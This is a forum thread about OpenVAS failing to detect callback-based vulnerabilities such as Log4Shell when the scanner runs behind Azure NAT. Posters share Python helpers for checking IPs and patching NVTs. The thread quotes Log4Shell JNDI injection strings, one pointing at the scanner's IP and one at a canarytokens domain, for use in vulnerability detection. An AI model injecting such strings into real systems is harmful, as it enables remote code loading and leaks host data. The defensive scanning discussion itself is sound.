OpenVAS is not able to detect vulnerabilities that need a callback when deployed in the cloud (at least in Azure)

Hi all,

I have deployed OpenVAS on a VPS in Azure. VPSs in Azure cannot have the public IP assigned directly to the network interface, because the public IP is a separate Azure resource; the NIC always gets the private IP that Azure assigns, so the whole setup effectively works behind NAT.

The problem with this deployment in Azure is that OpenVAS is not able to detect vulnerabilities whose check relies on a callback, for instance the Log4Shell/Log4j NVTs… This is because the payload that the Greenbone NVTs build is the following:
payload = "${jndi:ldap://" + ownip + ":" + rnd_port + "/a}";

So ownip is the internal IP of the Azure VPS, because the operating system does not have the public IP directly assigned to the network interface. I have contacted Azure and adding this capability to Azure network configuration (assigning the public IP directly to the NIC) is not on their roadmap.
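To see the split directly on the VM, here is a minimal Python sketch (not NASL) that asks the Azure Instance Metadata Service for the addresses of the first NIC. The endpoint and api-version follow the Azure IMDS documentation, but treat them as assumptions to verify on your own VM:

```python
# Sketch: on an Azure VM the public IP is never assigned to the NIC; it is only
# visible through the Instance Metadata Service (IMDS).
import urllib.request

IMDS = ("http://169.254.169.254/metadata/instance/network/interface/0"
        "/ipv4/ipAddress/0?api-version=2021-02-01")

req = urllib.request.Request(IMDS, headers={"Metadata": "true"})
with urllib.request.urlopen(req, timeout=2) as resp:
    print(resp.read().decode())
# Typically prints something like:
#   {"privateIpAddress":"10.0.0.4","publicIpAddress":"20.x.x.x"}
# The OS, and therefore the "ownip" used in the NVT payload, only ever sees
# privateIpAddress, so the LDAP callback address is unreachable from the target.
```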

Some people on the forum have proposed manually updating the NVTs with a canarytoken (for instance: payload = "${jndi:ldap://x${hostName}.abc.abcde12345.canarytokens.com/a}";), but that is an arduous task: you have to keep track of all the old and new NVTs and change every payload each time the feed is updated… It does not make sense…
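Just to make the maintenance burden concrete, a workaround like that would mean re-patching the feed after every sync. The Python sketch below is purely illustrative and assumes the default plugin directory (/var/lib/openvas/plugins) and that the payload is built exactly as shown above; any upstream change to an NVT silently breaks it:

```python
# Hypothetical post-feed-sync patcher: replace the ownip-based JNDI payload
# with a canarytoken domain in every NVT that builds one. Illustrates the
# fragile, feed-chasing maintenance this workaround requires.
import re
from pathlib import Path

PLUGIN_DIR = Path("/var/lib/openvas/plugins")             # assumed default feed location
CANARY = "x${hostName}.abc.abcde12345.canarytokens.com"   # your canarytoken domain

# Matches the payload construction shown above; new or rewritten NVTs may not match.
PATTERN = re.compile(
    r'"\$\{jndi:ldap://"\s*\+\s*ownip\s*\+\s*":"\s*\+\s*rnd_port\s*\+\s*"/a\}"')
REPLACEMENT = '"${jndi:ldap://' + CANARY + '/a}"'

for nasl in PLUGIN_DIR.glob("*.nasl"):
    text = nasl.read_text(errors="ignore")
    if PATTERN.search(text):
        nasl.write_text(PATTERN.sub(REPLACEMENT, text))
        print("patched", nasl.name)
```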

I assume this will also happen when OpenVAS is deployed in a container and the container is behind a NAT configuration…

I do not know if anyone has faced this problem before, and whether there is a solution other than moving to a VPS at another cloud provider that allows assigning the public IP directly to the NIC (without NAT).

Thanks in advance,
Cheers :slight_smile:

How is it defining "ownip"? Would this be a problem in a container as well, where the IP of the container would not be reachable from off the host?

"ownip" is the IP of the NIC that your OpenVAS scanner is using… I believe it is retrieved the same way the 'ifconfig' or 'ip' commands would report it… So it is also a problem in a container unless you are able to assign the public-facing IP to your container (e.g., via network_bridge in LXC).
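If it helps anyone reproduce the symptom: when a process asks the kernel for "its own" address, it gets whatever source IP the routing table would use, and behind Azure's NAT or a container bridge that is always a private address. A quick Python check (illustrative only, not how the NVTs themselves do it):

```python
# Quick check: is the scanner's "own" IP a private (e.g. RFC 1918) address?
# If so, callback-based NVTs cannot reach the scanner from the target
# without extra plumbing (public IP on the NIC, port forwarding, etc.).
import ipaddress
import socket

with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
    s.connect(("203.0.113.1", 53))        # documentation address; no packet is sent
    own_ip = ipaddress.ip_address(s.getsockname()[0])

if own_ip.is_private:
    print(f"{own_ip}: private - callbacks to this address will not reach the scanner from outside")
else:
    print(f"{own_ip}: public - callbacks can reach the scanner directly")
```

On an Azure VPS or inside a default Docker/LXC bridge this prints a 10.x.x.x or 172.17.x.x style address, which is exactly the value that ends up in the JNDI payload.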